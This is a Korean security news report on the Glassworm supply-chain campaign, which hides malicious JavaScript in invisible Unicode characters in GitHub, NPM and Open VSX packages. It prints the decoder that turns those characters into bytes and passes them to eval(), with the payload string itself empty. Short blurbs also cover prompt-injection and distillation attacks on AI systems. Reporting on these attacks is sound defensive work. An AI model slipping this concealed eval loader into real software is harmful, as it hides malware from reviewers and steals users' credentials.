공급망 공격은 탐지를 우회하기 위해 보이지 않는 유니코드 코드를 사용합니다.

Aikido Security의 보안 연구원들이 GitHub, NPM, Open VSX에 업로드된 패키지에서 악성 기능을 숨기기 위해 보이지 않는 유니코드 코드를 사용한 공급망 공격을 발견했습니다. Glassworm으로 명명된 공격 그룹은 2026년 3월 3일부터 9일까지 GitHub에 151개의 악성 패키지를 업로드했습니다.
보이지 않는 코드의 작동 방식
악성 패키지들은 편집기, 터미널, 코드 리뷰 인터페이스에서 볼 때 보이지 않는 공용 사용 영역(Public Use Areas 또는 Public Use Access라고도 함)의 유니코드 문자를 사용합니다. 대부분의 코드는 정상적으로 보이지만, 악성 기능과 페이로드는 이러한 보이지 않는 문자를 사용하여 렌더링되어 수동 코드 검토와 전통적인 방어 수단을 무력화합니다.
보이지 않는 유니코드 문자는 컴퓨터가 처리할 때 미국 알파벳의 모든 글자를 나타내지만, 사람에게는 공백이나 빈 줄로 표시됩니다. JavaScript 인터프리터는 이러한 문자를 일반 코드로 읽고 실행할 수 있습니다.
기술적 구현
분석된 한 패키지에서 공격자들은 보이지 않는 문자를 사용하여 악성 페이로드를 인코딩했습니다. 이 코드에는 숨겨진 바이트를 추출하여 eval()에 전달하는 디코더 함수가 포함되어 있습니다:
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
s()에 전달된 백틱 문자열은 뷰어에서는 비어 있는 것처럼 보이지만, 완전한 악성 페이로드로 디코딩되는 보이지 않는 문자를 포함하고 있습니다. 이전 사건에서 디코딩된 페이로드는 솔라나를 전달 채널로 사용하여 토큰, 자격 증명, 비밀을 훔치는 2단계 스크립트를 가져와 실행했습니다.
공격 특성
악성 패키지들은 특히 탐지하기 어려운 이유는 다음과 같습니다:
- 코드의 보이는 부분은 고품질이고 현실적입니다
- 주변 변경 사항에는 문서 수정, 버전 업데이트, 작은 리팩토링, 버그 수정이 포함됩니다
- 변경 사항은 대상 프로젝트의 스타일과 일관성이 있습니다
- 연구자들은 LLM이 설득력 있게 합법적인 패키지를 생성하는 데 사용된 것으로 의심하고 있습니다
이 유니코드 기술은 2024년에 AI 엔진에 공급되는 악성 프롬프트를 숨기기 위해 처음 사용되었으며, 이후 전통적인 멀웨어 공격에 적용되었습니다. 탐지된 151개의 패키지는 캠페인의 작은 일부를 나타낼 가능성이 높으며, 초기 업로드 이후 많은 패키지가 삭제되었습니다.
📖 Read the full source: HN AI Agents
👀 See Also

AppLovin 미디에이션 암호 해독됨: 기기 지문 인식으로 ATT 우회
리버스 엔지니어링 결과, AppLovin의 사용자 지정 암호는 고정 솔트 + SDK 키, SplitMix64 PRNG를 사용하며 인증이 없는 것으로 드러났습니다. 복호화된 요청에는 ATT가 거부된 경우에도 약 50개의 기기 필드(하드웨어 모델, 화면 크기, 로캘, 부팅 시간 등)가 포함되어 있어, 앱 간에 결정론적 재식별이 가능합니다.

OpenClaw 스킬 분석기: AI 에이전트 스킬용 정적 보안 스캐너
한 개발자가 설치 전에 OpenClaw 스킬의 보안 위험을 스캔하는 정적 분석기를 구축했으며, 프롬프트 인젝션과 데이터 유출을 포함한 12개 범주에 걸쳐 40개 이상의 탐지 규칙을 갖추고 있습니다.

Anthropic은 중국 AI 연구소들의 클로드에 대한 산업 규모의 증류 공격을 보고합니다
Anthropic은 DeepSeek, Moonshot, MiniMax 등 세 개의 중국 AI 기업이 24,000개 이상의 가짜 계정을 생성하여 Claude와 1,600만 건 이상의 교환을 생성하고, 체계적인 증류 공격을 통해 추론 능력을 추출한 것을 발견했습니다.

Claude Code --dangerously-skip-permissions 취약점 및 오픈소스 방어 도구
Lasso Security는 Claude Code에서 --dangerously-skip-permissions 플래그 사용 시 간접 프롬프트 주입 취약점을 발견했다고 발표했습니다. 공격 경로로는 악성 README 파일, 유해 웹 콘텐츠, MCP 서버 출력 등이 포함되며, 50개 이상의 탐지 패턴으로 도구 출력을 스캔하는 오픈소스 PostToolUse 훅을 공개했습니다.